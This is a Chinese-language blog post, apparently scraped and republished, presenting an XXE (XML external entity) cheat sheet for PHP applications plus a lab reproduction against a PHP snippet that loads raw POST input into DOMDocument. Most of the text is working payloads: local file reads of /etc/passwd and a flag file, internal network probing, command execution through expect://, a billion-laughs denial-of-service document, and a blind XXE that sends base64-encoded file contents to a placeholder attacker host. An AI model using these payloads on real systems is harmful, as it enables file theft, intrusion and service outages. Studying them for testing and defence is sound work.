2. 程式人生 > >PHP環境 XML外部實體註入漏洞(XXE)

PHP環境 XML外部實體註入漏洞(XXE)

阿新 發佈:2019-01-13
base64 pos tps txt system pass 很多 expec resource

XXE

XXE漏洞的文章網上就很多了

文件讀取

<!DOCTYPE root[
        <!ENTITY  xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root><name>&xxe;</name></root>
<!DOCTYPE root[
        <!ENTITY  xxe SYSTEM "file:///home/ctf/flag.txt">
]>
<root><name>&xxe;</name></root>
 
<!DOCTYPE root[
        <!ENTITY  xxe SYSTEM "c:/windows/date.ini">
]>
<root><name>&xxe;</name></root>

內網探測

<!DOCTYPE root[
        <!ENTITY  xxe SYSTEM "http://localhost/">
]>
<root><name>&xxe;</name></root>

命令執行

<!DOCTYPE root[
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://ls" >
]>
<root>
<name>&xxe;</name>
</root>

Dos攻擊

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Blind XXE

  • payload
<!DOCTYPE root[
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % dtd SYSTEM "http://www.xxx.com/evil">
    %dtd;
    %all;
    %send;
]>
  • http://www.xxx.com/evil
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://xx.xx.xx.xx/?f=%file;'>">

復現

容器啟動後先看一下其中的代碼
技術分享圖片

<?php
$data = file_get_contents('php://input');

$dom = new DOMDocument();
$dom->loadXML($data);

從php://input讀取數據,直接post就行
技術分享圖片

參考:
淺談XXE漏洞攻擊與防禦

PHP環境 XML外部實體註入漏洞(XXE)

相關推薦

PHP環境 XML外部實體漏洞XXE

base64 pos tps txt system pass 很多 expec resource XXE XXE漏洞的文章網上就很多了 文件讀取 <!DOCTYPE root[ <!ENTITY xxe SYSTEM "php://f

PHP環境 XML外部實體注入漏洞XXE

XXE XXE漏洞的文章網上就很多了 檔案讀取 <!DOCTYPE root[ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <

三、ADO.Net基礎【05】SQL漏洞SQLInjection

字符串 大於 拼接 匹配 常用 ado 執行 註入漏洞 基礎 使用字符串拼接的方式把sql語句所需參數拼接到將要執行的sql語句中(參數一般只sql語句的過濾條件),對於用戶的惡意輸入可能導致不一的查詢結果 例如:一個登錄的例子(UserName和Password是用戶的輸

XXE外部實體攻擊

版本 標簽 編碼 fix think 實體 名稱 利用 報錯 XXE(XML External Entity 外部實體註入) DTD(Document Type Definition 文檔類型定義)用來為XML文檔定義語義約束,可以嵌入在XML文檔中(內部聲明)也可以獨立的

WEB安全 php+mysql5防禦

tin 十六 data table into 一個數據庫 一個 mat 讀取配置文件 第四天:新的註入函數: ascii() substring("string",n,m) n>=1 limit n,m

Redtiger SQL練習

username shu The 查詢 info format print 多次 ali 感覺會的東西太少了,以後要多練習,多寫博客。要堅持學習,一定不能放棄,為夢想奮鬥。 redtiger 這個平臺早就開始做了,但是才做到第4關。。。。 第一關: 打開題,

小試XML實體攻擊

如果 utf nco target 參數 發送 類型 log 本地 基礎知識 XML(Extensible Markup Language)被設計用來傳輸和存儲數據。關於它的語法,本文不準備寫太多,只簡單介紹一下。 XML基本知識 1 2 3 4 5 <?

ref:ThinkPHP Builder.php SQL漏洞(<= 3.2.3)

syntax tle AR turn sql註入 cat 類型 times execute ThinkPHP Builder.php SQL註入漏洞(<= 3.2.3) ref:https://www.jianshu.com/p/18d06277161e TimeSH

【程式碼審計】CLTPHP_v5.5.3前臺XML外部實體注入漏洞分析

0x01 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/login/index

Xml外部實體注入漏洞(XXE)與防護

Xml外部實體注入(XXE) 除了json外,xml也是一種常用的資料傳輸格式。對xml的解析有以下幾種常用的方式:DOM,SAX,JDOM,DOM4J,StAX等。然而這幾種解析方式都可能會出現外部實體注入漏洞,如微信支付的回撥就出現過(見參考資料2)。

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

joomla core漏洞

field bug con 語句 joomla from 訪問 limit mail 註入語句如下: payload1 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[ful

[CVE-2017-5487] WordPress <=4.7.1 REST API 內容漏洞分析與復現

tps 文章 分析 請求 利用 api文檔 each includes 什麽 不是很新的漏洞,記錄下自己的工作任務 漏洞影響: 未授權獲取發布過文章的其他用戶的用戶名、id 觸發前提:wordpress配置REST API 影響版本:<= 4.7 0x01漏洞

【安全牛學習筆記】初識sql漏洞原理

信息安全 sql security+ 網站沒有對輸入的字符進行過濾,導致輸入的字符影響到網站數據的查詢。編程 數學邏輯思維 and or xor 且 或 否 或:有一個真就是真 且:有一個假就為假 否:相反怎麽找是否有註入漏洞? 第一個找符合參數鏈接的網站

CRLF漏洞

crlf 滲透測試 回車換行 CRLF是“回車 + 換行”(\r\n)的簡稱。在HTTP協議中,HTTP Header與HTTP Body是用兩個CRLF分隔的,瀏覽器就是根據這兩個CRLF(使用payload %0a%0d%0a%0d進行測試)來取出HTTP內容並顯示出來。所以,一旦我們能夠控制

SQL漏洞的分析與利用

ces mysql 得出 必須 排序 快速搭建 oracle 學習筆記 min SQL註入的核心思想 黑客在正常的需要調用數據庫的URL後面構造一段數據庫查詢代碼,然後根據返回的結果,從而獲得想要的某些數據。SQL結構化查詢語言,絕大多數關系型數據庫(MySQL、Acces

SQL漏洞的分析與利用

manage 如果 得到 nio 學習筆記 sql註入 .com 密碼 vpd Access手工註入 1.實驗環境:實驗平臺:小旋風ASPWeb服務器目標網站:南方數據2.02.打開網站,隨意點開一個頁面看到?id=4說明有參數傳遞,用的是get方法,可能是一個註入點加入判

SQL漏洞的分析與利用

和數 form 打開 用戶 data 用戶名 text 必須 存儲 MySQL數據庫: 元數據庫information_schema1.在5.0以後版本的MySQL中存在著一個元數據庫information_schema,其中存儲著用戶在MySQL中創建的所有其他數據庫的信

spring中用xml配置構造的心得

tor 如果 value span spring truct color 但是 寫法 spring中用xml配置構造註入時,如果 <constructor-arg> 屬性都是 ref ,則不用理會參數順序 <constructor-arg ref="k